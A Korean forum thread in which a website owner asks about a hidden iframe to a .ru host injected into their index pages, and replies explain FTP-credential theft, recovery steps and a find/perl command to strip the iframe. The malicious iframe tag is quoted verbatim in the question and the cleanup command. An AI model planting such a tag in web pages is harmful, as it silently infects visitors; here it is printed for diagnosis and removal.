급)해킹인가요?index페이지에 아이프레임으로 주소삽입~!! 정보
급)해킹인가요?index페이지에 아이프레임으로 주소삽입~!!본문
index페이지에 iframe이 삽입되어지는데 이 해킹당한건지요?
<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">
이런것이 인덱스 상단에 붙혀져있어서~ 다른 사이트에도 모두 붙어있더라고요~ 패치하면 낳아질까요?
댓글 전체
움.......... 파일이 수정됬으니 그렇쵸 ㅋ
웹에서 누가 수정했거나 자신의 컴퓨터가 바이러스에 감염된 상태에서
바이러스에 의해 index.php가 변조가 되고 index.php를 올렸다거나; 둘중 하나;
일단, 자신의 컴퓨터를 바이러스 검사 해보시고 이상없으시면 웹상에서 해킹된것으로 사료됩니다.^^
웹에서 누가 수정했거나 자신의 컴퓨터가 바이러스에 감염된 상태에서
바이러스에 의해 index.php가 변조가 되고 index.php를 올렸다거나; 둘중 하나;
일단, 자신의 컴퓨터를 바이러스 검사 해보시고 이상없으시면 웹상에서 해킹된것으로 사료됩니다.^^
인덱스 변조 해킹입니다.
화일을 수정하거나 백업된 기존 화일을 덮어쓰는 형식을 통해 복구가 가능합니다.
그러나 이내 또 동일한 방법으로 변조되는 것을 보실 수 있습니다.
해결책은 접속자의 백신을 강화하거나...
서버쪽을 강화하는 방법으로 어느정도 방어를 할 수 있습니다.
접속자 컴퓨터는 최대한 안정적이고 효과가 좋은 백신을 사용하여 자신의 컴퓨터가 감염이 되어 접속하는것을 막는것입니다. 하지만 이 방법은 한계가 있죠.
서버쪽은 ftp 접속하는 서버관리자 비번을 변경하거나.. 포트를 변경하거나...
이미 감염(노출)된 계정 정보를 변경해 나가는 방법이 있습니다.
접속할 때 보안 접속인 sftrp를 이용하는것도 좋습니다. FTP 또한 안정성 있는 툴을 이용하는것이 좋습니다.
화일을 수정하거나 백업된 기존 화일을 덮어쓰는 형식을 통해 복구가 가능합니다.
그러나 이내 또 동일한 방법으로 변조되는 것을 보실 수 있습니다.
해결책은 접속자의 백신을 강화하거나...
서버쪽을 강화하는 방법으로 어느정도 방어를 할 수 있습니다.
접속자 컴퓨터는 최대한 안정적이고 효과가 좋은 백신을 사용하여 자신의 컴퓨터가 감염이 되어 접속하는것을 막는것입니다. 하지만 이 방법은 한계가 있죠.
서버쪽은 ftp 접속하는 서버관리자 비번을 변경하거나.. 포트를 변경하거나...
이미 감염(노출)된 계정 정보를 변경해 나가는 방법이 있습니다.
접속할 때 보안 접속인 sftrp를 이용하는것도 좋습니다. FTP 또한 안정성 있는 툴을 이용하는것이 좋습니다.
iFrame injection 걸리셨어요...
ftp접속시 id, pass 노출되어 프레임을 계속만들어 바이러스 사이트로 계속유도하는 겁니다.
프레임페이지를 보는것만으로도 일반유저가 감염됩니다. 먼저 님의 바이러스부터 잡고 사이트점검들어가세요. 호스팅업체에 계정변경 요청하셔야 할 수도있습니다..
1. 본인컴터 바이러스 치료
2. ftp pass변경
3. 아이프레임찾아서 삭제(아래 일괄삭제 참조)
n. 위처럼 해놓고 몇일 보다가 아이프레임 또 생성되면 호스팅업체에 계정변경요청
아이프레임 소스찾아서 삭제하실 때 수작업으로 찾으면 답도 안나오고 완벽하지도 않죠...
루트에서 실행하세요. 루트이하 파일을 검색해 아이프레임들어가 있는 부분을 삭제하는 명령입니다.
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
telnet모드에서 실행하세요..
몇일전에 어떤님 홈페이지좀 봐달라고 접속했다가 저게 걸린사이트에 제가 걸렸다눈.. --,.--
응급처치하고 날짜를 일주일 전으로 돌려놓으니 괜찮아졌지만요...
안철수연구소 참고하세요.
http://kr.ahnlab.com/info/securityinfo/virusNIFocusVirus_View.ahn?news_dist=02&site_dist=01&category=VNI003&mid_cate=001&seq=11236&svccode=ac3001&contentscode=031
ftp접속시 id, pass 노출되어 프레임을 계속만들어 바이러스 사이트로 계속유도하는 겁니다.
프레임페이지를 보는것만으로도 일반유저가 감염됩니다. 먼저 님의 바이러스부터 잡고 사이트점검들어가세요. 호스팅업체에 계정변경 요청하셔야 할 수도있습니다..
1. 본인컴터 바이러스 치료
2. ftp pass변경
3. 아이프레임찾아서 삭제(아래 일괄삭제 참조)
n. 위처럼 해놓고 몇일 보다가 아이프레임 또 생성되면 호스팅업체에 계정변경요청
아이프레임 소스찾아서 삭제하실 때 수작업으로 찾으면 답도 안나오고 완벽하지도 않죠...
루트에서 실행하세요. 루트이하 파일을 검색해 아이프레임들어가 있는 부분을 삭제하는 명령입니다.
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
telnet모드에서 실행하세요..
몇일전에 어떤님 홈페이지좀 봐달라고 접속했다가 저게 걸린사이트에 제가 걸렸다눈.. --,.--
응급처치하고 날짜를 일주일 전으로 돌려놓으니 괜찮아졌지만요...
안철수연구소 참고하세요.
http://kr.ahnlab.com/info/securityinfo/virusNIFocusVirus_View.ahn?news_dist=02&site_dist=01&category=VNI003&mid_cate=001&seq=11236&svccode=ac3001&contentscode=031
일단 코드를 전부 삭제하시고 전부 복구가 되면,
(하위 폴더도 다 보셔야 합니다.)
작업하시는 컴퓨터, 피씨그린, v3lite 등을 이용해서 정밀검사 해보세요.
기본검사만해도 백도어 나올껍니다.
전부 치료하신다음
ftp 접속 비밀 번호 특수기호 들어가게 바꾸시고, 가능하면 sftp 이용하시고,
ftp 접속프로그램 이용하실때 아이디 비밀번호 여러개 저장 시키지 마시고,
가능하시면 접속하실때마다 타이핑해서 들어가세요~
그리고 꾸준히 바이러스 검사 해주시고요 ^^
수고하세요~
(하위 폴더도 다 보셔야 합니다.)
작업하시는 컴퓨터, 피씨그린, v3lite 등을 이용해서 정밀검사 해보세요.
기본검사만해도 백도어 나올껍니다.
전부 치료하신다음
ftp 접속 비밀 번호 특수기호 들어가게 바꾸시고, 가능하면 sftp 이용하시고,
ftp 접속프로그램 이용하실때 아이디 비밀번호 여러개 저장 시키지 마시고,
가능하시면 접속하실때마다 타이핑해서 들어가세요~
그리고 꾸준히 바이러스 검사 해주시고요 ^^
수고하세요~
정말 짜증나는 해킹이네요~!! 며칠간 지우고~ 계정비밀전호바꾸고~ v3 피시그린등 깔아 정밀검사를 며번이나 하고~ 그런데도 아직 완전히는 안되네요~!!
답변주신분들 감사하고 모두 채택하고 싶지만 일단 제일많이 써주신분께~
다른분들도 다음에 또 기회가 되면 ~
모두 감사드립니다~!! ^^
답변주신분들 감사하고 모두 채택하고 싶지만 일단 제일많이 써주신분께~
다른분들도 다음에 또 기회가 되면 ~
모두 감사드립니다~!! ^^
